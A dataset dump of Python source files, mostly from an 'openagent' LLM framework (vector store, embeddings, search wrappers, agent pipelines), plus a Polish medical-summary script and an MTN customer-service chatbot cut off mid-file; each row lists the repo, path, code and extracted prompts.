self.wiki_client.exceptions.PageError,
self.wiki_client.exceptions.DisambiguationError,
):
return None | [] |
2024-01-10 | priyanshics20/test | openagent~fact_check~utils~base~pipeline.py | import yaml
from openagent.fact_check.utils.openai_wrapper import OpenAIChat
import os
import pathlib
class pipeline():
def __init__(self, domain, foundation_model):
#if foundation_model == 'gpt-3.5-turbo' or foundation_model == 'gpt-4':
self.company = 'openai'
self.chat = OpenAIChat(model_name=foundation_model)
self.prompts_path = os.path.join(os.path.dirname(pathlib.Path(__file__)), "../prompts/")
with open(os.path.join(self.prompts_path, "self_check.yaml"), 'r') as file:
data = yaml.load(file, Loader=yaml.FullLoader)
self.self_check_prompt = data[domain] | [] |
2024-01-10 | priyanshics20/test | playground~autoscrum~autoscrum.py | #credit: Martin Schroder
#research paper: https://arxiv.org/abs/2306.03197
#organization: Swedish Embedded Consulting Group Research
#linkedin: martinschroder
#email: [email protected]
import json
from pathlib import Path
from datetime import datetime
from openagent import compiler
import pkg_resources as pg
from openagent.llms._openai import OpenAI
compiler.llm = OpenAI("gpt-3.5-turbo")
class AutoScrum:
def __init__(self, path):
self.featurizer = self.load_program("featurizer")
self.storylizer = self.load_program("storylizer")
self.goalmaker = self.load_program("goalmaker")
self.clarifier = self.load_program("clarifier")
self.acceptance = self.load_program("acceptance")
self.taskalizer = self.load_program("taskalizer")
self.requalizer = self.load_program("requalizer")
self.planner = self.load_program("planner")
if not Path(path).exists():
self.reset()
self.save(path)
self.data = self.load_data(path)
def reset(self):
self.data = {
"product": "Your product name",
"vision": "Your product vision",
"niche": "Your product niche",
"current_state": {},
"desired_state": {},
"plan": [],
"requirements": [],
"sprint_duration": "2 weeks",
"features": [],
"stories": [],
"avoid": []
}
def load_data(self, path):
"""
Loads data json file
"""
return json.loads(Path(path).read_text())
def load_program(self, name: str):
path = pg.resource_filename(__name__, f'data/{name}.hbs')
return compiler(Path(path).read_text(), silent=True)
def save(self, path):
Path(path).write_text(json.dumps(self.data, indent=4))
def gen_plan(self, count:int):
prog = self.planner(
current_state=self.data["current_state"],
desired_state=self.data["desired_state"],
plan=[p["task"] for p in self.data["plan"]],
count=count
)
try:
# print(prog)
obj = json.loads(prog["response"])
return obj
except:
# print(prog)
print("Error: JSON conversion failed")
return []
def add_plan(self, steps: list):
self.data["plan"].extend(steps)
@property
def plan(self):
return self.data["plan"]
def gen_requirements(self, count:int):
prog = self.requalizer(
product=self.data["product"],
vision=self.data["vision"],
niche=self.data["niche"],
current_state=self.data["current_state"],
desired_state=self.data["desired_state"],
requirements=[f["name"] for f in self.data["requirements"]],
count=count
)
try:
# print(prog)
obj = json.loads(prog["response"])
return obj
except:
print(prog)
print("Error: JSON conversion failed")
return []
def add_requirements(self, reqs: list):
self.data["requirements"].extend(reqs)
@property
def requirements(self):
return self.data["requirements"]
def gen_features(self, count:int):
prog = self.featurizer(
product=self.data["product"],
vision=self.data["vision"],
requirements=[req["description"] for req in self.data["requirements"]],
story_features=[s["feature"] for s in self.data["stories"]],
features = [feature["name"] for feature in self.data["features"]],
avoid=self.data["avoid"],
count=count
)
try:
print(prog)
obj = json.loads(prog["response"])
return obj
except:
print(prog)
print("Error: JSON conversion failed")
return []
def add_features(self, features: list):
self.data["features"].extend(features)
@property
def features(self):
return self.data["features"]
def gen_stories(self, count:int):
prog = self.storylizer(
product=self.data["product"],
niche=self.data["niche"],
vision=self.data["vision"],
features = [feature["name"] for feature in self.data["features"]],
current_state=self.data["current_state"],
desired_state=self.data["desired_state"],
stories = [story["name"] for story in self.data["stories"]],
count=count
)
print(prog)
return json.loads(prog["response"])
def add_stories(self, stories: list):
self.data["stories"].extend(stories)
@property
def stories(self):
return self.data["stories"]
def gen_goals(self, count:int):
prog = self.goalmaker(
project=self.data["project"],
sprint_duration=self.data["sprint_duration"],
product_vision=self.data["goal"],
backlog = [story["name"] for story in self.data["stories"]],
goals = [goal["title"] for goal in self.data["goals"]],
count=count
)
print(prog)
return json.loads(prog["goals"])
def add_goals(self, goals: list):
self.data["goals"].extend(goals)
@property
def goals(self):
return self.data["goals"]
def gen_acceptance_criteria(self, story, count:int):
prog = self.acceptance(
product=self.data["product"],
requirements=[req["description"] for req in self.data["requirements"]],
story=story,
count=count
)
print(prog)
return json.loads(prog["response"])
def gen_tasks(self, story, count:int):
prog = self.taskalizer(
product=self.data["product"],
story=story,
count=count
)
print(prog)
return json.loads(prog["response"])
def gen_clarification(self, story, count:int):
prog = self.clarifier(
story=story,
completed_tasks=[],
resources=[],
count=count
)
print(prog)
return json.loads(prog["response"])
| [] |
2024-01-10 | priyanshics20/test | openagent~finetune~LLMFinetune.py | from abc import ABC, abstractmethod
from logging import Logger
import openai
class LLMFinetune(ABC):
def __init__(self, logger: Logger, openai_key: str):
self.logger = logger
openai.api_key = openai_key
@abstractmethod
def transform_data(self, train_csv_file: str, val_csv_file: str , train_output_file: str, val_output_file: str) -> str:
pass
@abstractmethod
def finetune(self, **kwargs):
pass
| [] |
2024-01-10 | priyanshics20/test | playground~prd_agent~prd.py |
from typing import List, Tuple
from openagent import compiler
from openagent.llms._openai import OpenAI
import pkg_resources as pg
from pathlib import Path
path = pg.resource_filename(__name__, 'prompts/prd.hbs')
prd_prompt_template = Path(path).read_text()
path = pg.resource_filename(__name__, 'prompts/prompt.hbs')
prompt_template = Path(path).read_text()
# prompt_template.format(FORMAT_EXAMPLE)
llm = OpenAI("gpt-4")
engine = compiler(template = prompt_template, llm = llm, silent=True)
class PRDDeveloper:
def __init__(self, goal = None, prd_prompt_template = prd_prompt_template, engine = engine
):
self.goal = goal
self.prd_prompt_template = prd_prompt_template
self.engine = engine
def run(self):
output = self.engine(goal = self.goal, prompt_template = self.prd_prompt_template)
return output['response']
| [] |
2024-01-10 | priyanshics20/test | openagent~vectorstores~embeddings~elasticsearch.py | from __future__ import annotations
from typing import TYPE_CHECKING, List, Optional, Any
from openagent.utils import get_from_env
if TYPE_CHECKING:
from elasticsearch import Elasticsearch
from elasticsearch.client import MlClient
from openagent.vectorstores.embeddings.base import Embeddings
class ElasticsearchEmbeddings(Embeddings):
"""
Wrapper around Elasticsearch embedding models.
This class provides an interface to generate embeddings using a model deployed
in an Elasticsearch cluster. It requires an Elasticsearch connection object
and the model_id of the model deployed in the cluster.
In Elasticsearch you need to have an embedding model loaded and deployed.
- https://www.elastic.co/guide/en/elasticsearch/reference/current/infer-trained-model.html
- https://www.elastic.co/guide/en/machine-learning/current/ml-nlp-deploy-models.html
""" # noqa: E501
def __init__(
self,
client: Any,
model_id: str,
*,
input_field: str = "text_field",
):
"""
Initialize the ElasticsearchEmbeddings instance.
Args:
client (MlClient): An Elasticsearch ML client object.
model_id (str): The model_id of the model deployed in the Elasticsearch
cluster.
input_field (str): The name of the key for the input text field in the
document. Defaults to 'text_field'.
"""
self.client = client
self.model_id = model_id
self.input_field = input_field
@classmethod
def from_credentials(
cls,
model_id: str,
*,
es_cloud_id: Optional[str] = None,
es_user: Optional[str] = None,
es_password: Optional[str] = None,
input_field: str = "text_field",
) -> ElasticsearchEmbeddings:
"""Instantiate embeddings from Elasticsearch credentials.
Args:
model_id (str): The model_id of the model deployed in the Elasticsearch
cluster.
input_field (str): The name of the key for the input text field in the
document. Defaults to 'text_field'.
es_cloud_id: (str, optional): The Elasticsearch cloud ID to connect to.
es_user: (str, optional): Elasticsearch username.
es_password: (str, optional): Elasticsearch password.
Example:
.. code-block:: python
from langchain.embeddings import ElasticsearchEmbeddings
# Define the model ID and input field name (if different from default)
model_id = "your_model_id"
# Optional, only if different from 'text_field'
input_field = "your_input_field"
# Credentials can be passed in two ways. Either set the env vars
# ES_CLOUD_ID, ES_USER, ES_PASSWORD and they will be automatically
# pulled in, or pass them in directly as kwargs.
embeddings = ElasticsearchEmbeddings.from_credentials(
model_id,
input_field=input_field,
# es_cloud_id="foo",
# es_user="bar",
# es_password="baz",
)
documents = [
"This is an example document.",
"Another example document to generate embeddings for.",
]
embeddings_generator.embed_documents(documents)
"""
try:
from elasticsearch import Elasticsearch
from elasticsearch.client import MlClient
except ImportError:
raise ImportError(
"elasticsearch package not found, please install with 'pip install "
"elasticsearch'"
)
es_cloud_id = es_cloud_id or get_from_env("es_cloud_id", "ES_CLOUD_ID")
es_user = es_user or get_from_env("es_user", "ES_USER")
es_password = es_password or get_from_env("es_password", "ES_PASSWORD")
# Connect to Elasticsearch
es_connection = Elasticsearch(
cloud_id=es_cloud_id, basic_auth=(es_user, es_password)
)
client = MlClient(es_connection)
return cls(client, model_id, input_field=input_field)
@classmethod
def from_es_connection(
cls,
model_id: str,
es_connection: Elasticsearch,
input_field: str = "text_field",
) -> ElasticsearchEmbeddings:
"""
Instantiate embeddings from an existing Elasticsearch connection.
This method provides a way to create an instance of the ElasticsearchEmbeddings
class using an existing Elasticsearch connection. The connection object is used
to create an MlClient, which is then used to initialize the
ElasticsearchEmbeddings instance.
Args:
model_id (str): The model_id of the model deployed in the Elasticsearch cluster.
es_connection (elasticsearch.Elasticsearch): An existing Elasticsearch
connection object. input_field (str, optional): The name of the key for the
input text field in the document. Defaults to 'text_field'.
Returns:
ElasticsearchEmbeddings: An instance of the ElasticsearchEmbeddings class.
Example:
.. code-block:: python
from elasticsearch import Elasticsearch
from langchain.embeddings import ElasticsearchEmbeddings
# Define the model ID and input field name (if different from default)
model_id = "your_model_id"
# Optional, only if different from 'text_field'
input_field = "your_input_field"
# Create Elasticsearch connection
es_connection = Elasticsearch(
hosts=["localhost:9200"], http_auth=("user", "password")
)
# Instantiate ElasticsearchEmbeddings using the existing connection
embeddings = ElasticsearchEmbeddings.from_es_connection(
model_id,
es_connection,
input_field=input_field,
)
documents = [
"This is an example document.",
"Another example document to generate embeddings for.",
]
embeddings_generator.embed_documents(documents)
"""
# Importing MlClient from elasticsearch.client within the method to
# avoid unnecessary import if the method is not used
from elasticsearch.client import MlClient
# Create an MlClient from the given Elasticsearch connection
client = MlClient(es_connection)
# Return a new instance of the ElasticsearchEmbeddings class with
# the MlClient, model_id, and input_field
return cls(client, model_id, input_field=input_field)
def _embedding_func(self, texts: List[str]) -> List[List[float]]:
"""
Generate embeddings for the given texts using the Elasticsearch model.
Args:
texts (List[str]): A list of text strings to generate embeddings for.
Returns:
List[List[float]]: A list of embeddings, one for each text in the input
list.
"""
response = self.client.infer_trained_model(
model_id=self.model_id, docs=[{self.input_field: text} for text in texts]
)
embeddings = [doc["predicted_value"] for doc in response["inference_results"]]
return embeddings
def embed_documents(self, texts: List[str]) -> List[List[float]]:
"""
Generate embeddings for a list of documents.
Args:
texts (List[str]): A list of document text strings to generate embeddings
for.
Returns:
List[List[float]]: A list of embeddings, one for each document in the input
list.
"""
return self._embedding_func(texts)
def embed_query(self, text: str) -> List[float]:
"""
Generate an embedding for a single query text.
Args:
text (str): The query text to generate an embedding for.
Returns:
List[float]: The embedding for the input query text.
"""
return self._embedding_func([text])[0] | [] |
2024-01-10 | priyanshics20/test | openagent~fact_check~utils~claim_extractor.py | import os
import pathlib
import openai
import yaml
import json
import asyncio
from tqdm import tqdm
from openagent.fact_check.env_config import factool_env_config
# env
# openai.api_key = factool_env_config.openai_api_key
config = {
'model_name': 'gpt-3.5-turbo',
'max_tokens': 2000,
'temperature': 0.0,
'top_p': 1,
'frequency_penalty': 0.0,
'presence_penalty': 0.0,
'n': 1
}
# Make api calls asynchronously
async def run_api(messages):
async def single_run(message):
output = openai.ChatCompletion.create(
model=config['model_name'],
messages=message,
max_tokens=config['max_tokens'],
temperature=config['temperature'],
top_p=config['top_p'],
frequency_penalty=config['frequency_penalty'],
presence_penalty=config['presence_penalty'],
n=config['n'],
)
return output.choices[0].message.content.strip()
responses = [single_run(messages[index]) for index in range(len(messages))]
return await asyncio.gather(*responses)
# Import data from scientific.json
scientific_list = []
with open("../datasets/scientific/scientific.json", "r") as f:
data = json.load(f)
for dict_data in data:
cur_dict = {'dataset_name': 'scientific',
'question': dict_data["question"],
'factual_response': dict_data['factual_response']}
scientific_list.append(cur_dict)
# Apply template prompt
with open("./prompts/claim_extraction.yaml") as f:
data = yaml.load(f, Loader=yaml.FullLoader)
prompt = data['scientific']
messages_list = [
[
{"role": "system", "content": prompt['system']},
{"role": "user", "content": prompt['user'].format(input=sample['factual_response'])},
]
for sample in scientific_list
]
assert len(messages_list) == len(scientific_list), "The data length is different"
# Run the API to get the output
print("begin claims extraction...")
results = asyncio.run(run_api(messages_list))
for i in range(len(scientific_list)):
scientific_list[i]["claims"] = results[i]
with open('../datasets/scientific/scientific_claims.json', 'w') as f:
json.dump(scientific_list, f, indent=4)
"""
The scientific_claims.json file saved by the above code may have format problems, here are some adjustments
"""
with open("../datasets/scientific/scientific_claims.json", "r") as f:
data = json.load(f)
for data_i in tqdm(data, total=len(data)):
try:
data_i["claims"] = json.loads(data_i["claims"].strip())
except:
print(data_i["claims"])
continue
with open("../datasets/scientific/scientific_claims.json", "w") as f:
json.dump(data, f, indent=4)
| [
"scientific",
"factual_response"
] |
2024-01-10 | priyanshics20/test | openagent~helpers~wolframalpha.py | #Code taken directly from langchain gihub repo
"""Util that calls WolframAlpha."""
from typing import Any, Dict, Optional
from pydantic import BaseModel, Extra, root_validator
from openagent.utils import get_from_dict_or_env
class WolframAlphaAPIWrapper(BaseModel):
"""Wrapper for Wolfram Alpha.
Docs for using:
1. Go to wolfram alpha and sign up for a developer account
2. Create an app and get your APP ID
3. Save your APP ID into WOLFRAM_ALPHA_APPID env variable
4. pip install wolframalpha
"""
wolfram_client: Any #: :meta private:
wolfram_alpha_appid: Optional[str] = None
class Config:
"""Configuration for this pydantic object."""
extra = Extra.forbid
@root_validator()
def validate_environment(cls, values: Dict) -> Dict:
"""Validate that api key and python package exists in environment."""
wolfram_alpha_appid = get_from_dict_or_env(
values, "wolfram_alpha_appid", "WOLFRAM_ALPHA_APPID"
)
values["wolfram_alpha_appid"] = wolfram_alpha_appid
try:
import wolframalpha
except ImportError:
raise ImportError(
"wolframalpha is not installed. "
"Please install it with `pip install wolframalpha`"
)
client = wolframalpha.Client(wolfram_alpha_appid)
values["wolfram_client"] = client
return values
def run(self, query: str) -> str:
"""Run query through WolframAlpha and parse result."""
res = self.wolfram_client.query(query)
try:
assumption = next(res.pods).text
answer = next(res.results).text
except StopIteration:
return "Wolfram Alpha wasn't able to answer it"
if answer is None or answer == "":
# We don't want to return the assumption alone if answer is empty
return "No good Wolfram Alpha Result was found"
else:
return f"Assumption: {assumption} \nAnswer: {answer}" | [] |
2024-01-10 | priyanshics20/test | openagent~helpers~bingsearch.py | #Directly taken from Langchain Github Repo
"""Util that calls Bing Search.
In order to set this up, follow instructions at:
https://levelup.gitconnected.com/api-tutorial-how-to-use-bing-web-search-api-in-python-4165d5592a7e
"""
from typing import Dict, List
import requests
from pydantic import BaseModel, Extra, root_validator
from openagent.utils import get_from_dict_or_env
class BingSearchAPIWrapper(BaseModel):
"""Wrapper for Bing Search API.
In order to set this up, follow instructions at:
https://levelup.gitconnected.com/api-tutorial-how-to-use-bing-web-search-api-in-python-4165d5592a7e
"""
bing_subscription_key: str
bing_search_url: str
k: int = 10
class Config:
"""Configuration for this pydantic object."""
extra = Extra.forbid
def _bing_search_results(self, search_term: str, count: int) -> List[dict]:
headers = {"Ocp-Apim-Subscription-Key": self.bing_subscription_key}
params = {
"q": search_term,
"count": count,
"textDecorations": True,
"textFormat": "HTML",
}
response = requests.get(
self.bing_search_url, headers=headers, params=params # type: ignore
)
response.raise_for_status()
search_results = response.json()
return search_results["webPages"]["value"]
@root_validator(pre=True)
def validate_environment(cls, values: Dict) -> Dict:
"""Validate that api key and endpoint exists in environment."""
bing_subscription_key = get_from_dict_or_env(
values, "bing_subscription_key", "BING_SUBSCRIPTION_KEY"
)
values["bing_subscription_key"] = bing_subscription_key
bing_search_url = get_from_dict_or_env(
values,
"bing_search_url",
"BING_SEARCH_URL",
# default="https://api.bing.microsoft.com/v7.0/search",
)
values["bing_search_url"] = bing_search_url
return values
def run(self, query: str) -> str:
"""Run query through BingSearch and parse result."""
snippets = []
results = self._bing_search_results(query, count=self.k)
if len(results) == 0:
return "No good Bing Search Result was found"
for result in results:
snippets.append(result["snippet"])
return " ".join(snippets)
def results(self, query: str, num_results: int) -> List[Dict]:
"""Run query through BingSearch and return metadata.
Args:
query: The query to search for.
num_results: The number of results to return.
Returns:
A list of dictionaries with the following keys:
snippet - The description of the result.
title - The title of the result.
link - The link to the result.
"""
metadata_results = []
results = self._bing_search_results(query, count=num_results)
if len(results) == 0:
return [{"Result": "No good Bing Search Result was found"}]
for result in results:
metadata_result = {
"snippet": result["snippet"],
"title": result["name"],
"link": result["url"],
}
metadata_results.append(metadata_result)
return metadata_results | [] |
2024-01-10 | priyanshics20/test | openagent~vectorstores~chroma.py | import uuid
from openagent.schema import Document
from openagent.vectorstores.base import VectorStore
from typing import Any, Optional, Iterable, List, Dict
from openagent.vectorstores.embeddings.base import Embeddings
import chromadb
import chromadb.config
class Chroma(VectorStore):
"""Wrapper around ChromaDB embeddings platform.
To use, you should have the ``chromadb`` python package installed.
Example:
.. code-block:: python
from openagent.vectorstores import Chroma
from openagent.embeddings.openai import OpenAIEmbeddings
embeddings = OpenAIEmbeddings()
vectorstore = Chroma("openagent_collection", embeddings)
"""
def __init__(
self,
collection_name: str = "openagent",
embedding_function: Optional[Embeddings] = None,
persist_directory: Optional[str] = None,
client_settings: Optional[chromadb.config.Settings] = None,
collection_metadata: Optional[Dict] = None,
client: Optional[chromadb.Client] = None,
) -> None:
"""Initialize with Chroma client."""
try:
import chromadb
import chromadb.config
except ImportError:
raise ValueError(
"Could not import chromadb python package. "
"Please install it with `pip install chromadb`."
)
if client is not None:
self._client = client
else:
if client_settings:
self._client_settings = client_settings
else:
self._client_settings = chromadb.config.Settings()
if persist_directory is not None:
self._client_settings = chromadb.config.Settings(
chroma_db_impl="duckdb+parquet",
persist_directory=persist_directory,
)
self._client = chromadb.Client(self._client_settings)
self._embedding_function = embedding_function
self._persist_directory = persist_directory
self._collection = self._client.get_or_create_collection(
name=collection_name,
embedding_function=self._embedding_function.embed_documents
if self._embedding_function is not None
else None,
metadata=collection_metadata,
)
def add_texts(
self,
texts: Iterable[str],
metadatas: Optional[List[dict]] = None,
ids: Optional[List[str]] = None,
**kwargs: Any,
) -> List[str]:
ids = ids or [str(uuid.uuid1()) for _ in texts]
embeddings = None
if self._embedding_function is not None:
embeddings = self._embedding_function.embed_documents(list(texts))
self._collection.add(
metadatas=metadatas, embeddings=embeddings, documents=texts, ids=ids
)
return ids
def similarity_search(
self,
query: Optional[str] = None,
embedding: Optional[List[float]] = None,
top_k: int = 5,
**kwargs: Any
) -> List[Document]:
"""Return docs most similar to query and respective distance score"""
if (embedding is None and query is None) or (embedding is not None and query is not None):
raise ValueError("You must provide either query embeddings or query texts, but not both")
search_results = []
if self._embedding_function is None:
if query is not None:
results = self._collection.query(
query_texts=[query],
n_results=top_k,
**kwargs,
)
else:
results = self._collection.query(
query_embeddings=[embedding],
n_results=top_k,
**kwargs,
)
else:
if query is not None:
query_embedding = self._embedding_function.embed_query(text=query)
results = self._collection.query(
query_embeddings=[query_embedding],
n_results=top_k,
**kwargs,
)
else:
results = self._collection.query(
query_embeddings=[embedding],
n_results=top_k,
**kwargs,
)
for result in zip(
results["documents"][0],
results["metadatas"][0],
results["distances"][0],
):
document = Document(page_content=result[0], metadata=result[1] or {})
search_results.append((document, result[2]))
return search_results
def delete_collection(self) -> None:
"""Delete the collection."""
self._client.delete_collection(self._collection.name)
def get(self, include: Optional[List[str]] = None) -> Dict[str, Any]:
"""Gets the collection.
Args:
include (Optional[List[str]]): List of fields to include from db.
Defaults to None.
"""
if include is not None:
return self._collection.get(include=include)
else:
return self._collection.get()
def persist(self) -> None:
"""Persist the collection.
This can be used to explicitly persist the data to disk.
It will also be called automatically when the object is destroyed.
"""
if self._persist_directory is None:
raise ValueError(
"You must specify a persist_directory on"
"creation to persist the collection."
)
self._client.persist()
def update_document(self, document_id: str, document: Document) -> None:
# Update a document in the collection.
text = document.page_content
metadata = document.metadata
if self._embedding_function is None:
raise ValueError(
"For update, you must specify an embedding function on creation."
)
embeddings = self._embedding_function.get_document_embedding([text])
self._collection.update(
ids=[document_id],
embeddings=embeddings,
documents=[text],
metadatas=[metadata],
)
@classmethod
def from_texts(
cls,
texts: List[str],
embedding_function: Optional[Embeddings] = None,
metadatas: Optional[List[dict]] = None,
ids: Optional[List[str]] = None,
collection_name: str = "openagent",
persist_directory: Optional[str] = None,
client_settings: Optional[chromadb.config.Settings] = None,
client: Optional[chromadb.Client] = None,
**kwargs: Any,
):
"""Create a Chroma vectorstore from a raw documents.
If a persist_directory is specified, the collection will be persisted there.
Otherwise, the data will be ephemeral in-memory.
Args:
texts (List[str]): List of texts to add to the collection.
collection_name (str): Name of the collection to create.
persist_directory (Optional[str]): Directory to persist the collection.
embedding (Optional[Embeddings]): Embedding function. Defaults to None.
metadatas (Optional[List[dict]]): List of metadatas. Defaults to None.
ids (Optional[List[str]]): List of document IDs. Defaults to None.
client_settings (Optional[chromadb.config.Settings]): Chroma client settings
Returns:
Chroma: Chroma vectorstore.
"""
chroma_collection = cls(
collection_name=collection_name,
embedding_function=embedding_function,
persist_directory=persist_directory,
client_settings=client_settings,
client=client,
)
chroma_collection.add_texts(texts=texts, metadatas=metadatas, ids=ids)
return chroma_collection
@classmethod
def from_documents(
cls,
documents: List[Document],
embedding_function: Optional[Embeddings] = None,
ids: Optional[List[str]] = None,
collection_name: str = "openagent",
persist_directory: Optional[str] = None,
client_settings: Optional[chromadb.config.Settings] = None,
client: Optional[chromadb.Client] = None, # Add this line
**kwargs: Any,
):
"""Create a Chroma vectorstore from a list of documents.
If a persist_directory is specified, the collection will be persisted there.
Otherwise, the data will be ephemeral in-memory.
Args:
collection_name (str): Name of the collection to create.
persist_directory (Optional[str]): Directory to persist the collection.
ids (Optional[List[str]]): List of document IDs. Defaults to None.
documents (List[Document]): List of documents to add to the vectorstore.
embedding (Optional[Embeddings]): Embedding function. Defaults to None.
client_settings (Optional[chromadb.config.Settings]): Chroma client settings
Returns:
Chroma: Chroma vectorstore.
"""
texts = [doc.page_content for doc in documents]
metadatas = [doc.metadata for doc in documents]
return cls.from_texts(
texts=texts,
embedding=embedding_function,
metadatas=metadatas,
ids=ids,
collection_name=collection_name,
persist_directory=persist_directory,
client_settings=client_settings,
client=client,
**kwargs
) | [] |
2024-01-10 | atlomak/leothon | app~gptintegrator.py | import os
import openai
openai.api_type = "azure"
openai.api_version = "2022-12-01"
openai.api_base = os.getenv("OPENAI_ENDPOINT")
openai.api_key = os.getenv("OPENAI_API_KEY")
def get_openai_sympthoms(prompt: str):
response = openai.Completion.create(
engine="TextDaVinci003",
prompt=f"""
Podsumuj objawy pacjenta na podstawie transkrypcji rozmowy w pojedyńczych prostych zdaniach/słowach.
Przykład: Ból gardła, rano. Brak gorączki. Problemy ze snem od dłuższego czasu.
Rozmowa: {prompt}
""",
max_tokens=750,
temperature=0,
)
return response['choices'][0]['text']
def get_openai_recommendations(prompt: str):
response = openai.Completion.create(
engine="TextDaVinci003",
prompt=f"""
Podsumuj zalecenia lekarza oraz jakie leki powinien przyjmować pacjent na podstawie rozmowy. Nie dodawaj nic od siebie! Napisz bardzo zwięźle.
Rozmowa: {prompt}
""",
max_tokens=750,
temperature=0,
)
return response['choices'][0]['text'] | [
"\n Podsumuj zalecenia lekarza oraz jakie leki powinien przyjmować pacjent na podstawie rozmowy. Nie dodawaj nic od siebie! Napisz bardzo zwięźle.\n Rozmowa: PLACEHOLDER\n ",
"\n Podsumuj objawy pacjenta na podstawie transkrypcji rozmowy w pojedyńczych prostych zdaniach/słowach.\n Przykład: Ból gardła, rano. Brak gorączki. Problemy ze snem od dłuższego czasu.\n Rozmowa: PLACEHOLDER\n "
] |
2024-01-10 | Yeok-c/track-token-usage | example.py | from src.track_usage import TokenTrack
from langchain.callbacks import get_openai_callback
from langchain.chains import LLMChain
from langchain.chat_models import ChatOpenAI
from langchain.prompts import ChatPromptTemplate
class YourClass(TokenTrack):
def __init__(self):
super(YourClass, self).__init__()
def your_function(self):
with get_openai_callback() as cb:
# any langchain function to be calculated
results = LLMChain(
llm=ChatOpenAI(),
prompt=ChatPromptTemplate.from_template("What's the capitol of {country}? List 20 top attractions there"),
verbose=True
).run("France")
print(results)
self.update_usage(cb)
def whenever_you_want_to_check(self):
self.print_usage()
if __name__ == "__main__":
yourclass = YourClass()
yourclass.your_function() | [
"What's the capitol of {country}? List 20 top attractions there"
] |
2024-01-10 | dedol1/VCABuddy | VCABuddy~chat~chat_bot.py | from datetime import datetime
from django.conf import settings
import os
# from TTS.api import TTS
from gtts import gTTS
import openai
from chat.load_speaker_module import speaker_encoder_model_twi, speaker_encoder_model_ewe
class Chatbot:
def __init__(self, api_key):
openai.api_key = api_key
def get_response(self, user_input, language, input_type):
# Define context in both Twi and English
context_en = """
Context: MTN Network Service Provider
MTN is a leading network service provider that offers a wide range of services, including mobile data, voice calls, and more. Our mission is to provide our customers with seamless connectivity and exceptional customer service.
User Queries:
1. How can I buy MTN data bundles?
2. Where can I locate the nearest MTN office?
3. Can you help me with information on MTN's international roaming services?
4. What are the steps to port my number to MTN network?
5. Is there a self-service app available for MTN customers?
6. What options are available for MTN postpaid users?
Feel free to ask any questions related to MTN services, and we'll be happy to assist you!
"""
context_twi = """
Context: MTN Network Service Provider
MTN yɛ ɔhaw bi mu bi a ɛwɔ nnidi mfitiase sɛ, na wɔde nkↄmmↄ no, nkↄmmↄnkↄmmↄ, nkutoo na nnidi mfitiase bi a ɛsↄ yɛ.
Yɛn asafo no yɛ sika akokↄkↄↄ no a, yegye nnidi nnidi bi ma wↄn atoↄ yↄnka no, na yↄn atete yie no adwuma.
Anidaso a Ɔbarima/Ɔbea no awↄ.
1. Me dↄ MTN dↄta baablu bↄmmobi?
2. Ɛhwↄ me soro MTN ofis firi ha?
3. Wo nni sika akawↄ, anaa wopɛ sika akawↄ wↄ MTN afa no?
4. Adwuma a wↄde nnidi no ↄhia no asomdwoe mu sika akawↄ?
5. Saa ara no, MTN mma adwuma no ↄde wo app akawↄ.
6. Afei dↄn sika akawↄ bɛn wo dↄm nni ho?
Saa nti, monka adↄyↄ ase a, ɛno yie no.
"""
context_ewe = """
Context: MTN Network Service Provider
MTN wɔ kwan no a ɛma nnidi mfitiase sɛ, nso ɛka ntwam. Sɛ ɛbɛma wo, moblɛ dɛta, asɔ wɔ nni kasa, na nsɛm bi a ɛbɛma wo. Yɛ kyerɛwfo a ɛma wɔbɛtumi aka ɔkwan, na yɛn atete nso ahyɛdeɛ.
Ɔbarima/Ɔbea Anidaso:
1. Menka sika nsu ma MTN nombɛ no, sɛnea ɛbɛyɛ a?
2. Ƌfeme de la miwo MTN ofis nyanya kple?
3. Ɛyɛ dometɔwo ɖeka nuto la gɔme MTN's international roaming afe?
4. Ɛyi wo de nutodzi wo MTN network nutolu ɖekawo gake?
5. Ɛsiwɔsia yeye dzi wo ame do ŋu nɔ na ɖekawo fawo MTN nombɛ nɔ wɔe?
6. Ata wotutuwo kple MTN postpaid nombɛ nɔ nuto wo me?
Wobɛkɔ ɛpam ɔbarima/Ɔbea Anidaso mu ase, na yɛbɛsie wo.
"""
twi_dict = {
"hello": "Hello, yɛma wo akwaaba ba MTN customer service, yɛbɛyɛ dɛn aboa wo nnɛ?",
"mɛyɛ dɛn atɔ mtn data":"Yɛda mo ase sɛ moakɔ yɛn nkyɛn. Sɛ wopɛ mmoa wɔ airtime a wobɛtɔ anaasɛ credit ma wo MTN nɔma a, yɛsrɛ wo frɛ '*143#' fi wo fon so. Sɛ worehyia nsɛmnsɛm wɔ wo nkrataahyɛ ho a, wobɛtumi akɔ yɛn adetɔfoɔ mmoa nkyɛn",
"ɛhe na metumi ahwehwɛ mtn office":"",
"Me ntumi nnya intanɛt nkitahodi mfiri me sim card so":"Yɛpa kyɛw wɔ ɔhaw no ho. Yɛsrɛ wo hwɛ hu sɛ wo data nhyehyɛe no yɛ adwuma na wɔahyehyɛ wo mfiri no yiye sɛnea ɛbɛyɛ a ɛbɛkɔ intanɛt so. Sɛ asɛm no kɔ so a, yɛsrɛ wo, di yɛn atɔfo adwumayɛfo kuw no nkitaho na woanya mmoa foforo. Meda wo ase.",
}
ewe_dict = {
"hello": "Mido gbe na wò, míexɔ wò nyuie ɖe MTN ƒe asisiwo ƒe dɔwɔƒe, aleke míate ŋu akpe ɖe ŋuwò egbea?",
"aleke mawɔ aƒle mtn data bundle":"Akpe na mi be miedo asi ɖe mía gbɔ. Ne èdi kpekpeɖeŋu le yameʋuɖoɖo ƒeƒle alo credit na wò MTN xexlẽdzesi la, taflatse ƒo '*143#' tso wò fon dzi. Ne kuxiwo le fu ɖem na wò le wò nudɔdɔ ŋu la, àte ŋu aɖo míaƒe asisiwo ƒe kpekpeɖeŋunadɔa gbɔ",
"afi kae mate ŋu akpɔ mtn ɔfis le":"",
"Nyemete ŋu xɔ internet kadodo tso nye sim card dzi o":"Míeɖe kuku ɖe fuɖenamea ta. Taflatse kpɔ egbɔ be wò nyatakakawo ƒe ɖoɖoa le dɔ wɔm eye be woɖo wò mɔ̃a nyuie be wòate ŋu age ɖe internet dzi. Ne nyaa gakpɔtɔ li la, taflatse te ɖe míaƒe asisiwo ƒe dɔwɔƒea ŋu hena kpekpeɖeŋu bubuwo. Akpe na wò.",
}
# Select the appropriate context based on the chosen language
if language == "English":
context = context_en
elif language == "Twi":
context = context_twi
elif language == "Ewe":
context = context_ewe
else:
context = context_en # Default to English if the language is not recognized
# Create a prompt that includes the user's input, context, and desired language
prompt = f"{context}\nLanguage: {language}\nUser Input: {user_input}\nResponse:"
response = ""
if language == "English":
# Make a request to the OpenAI GPT API to generate a response
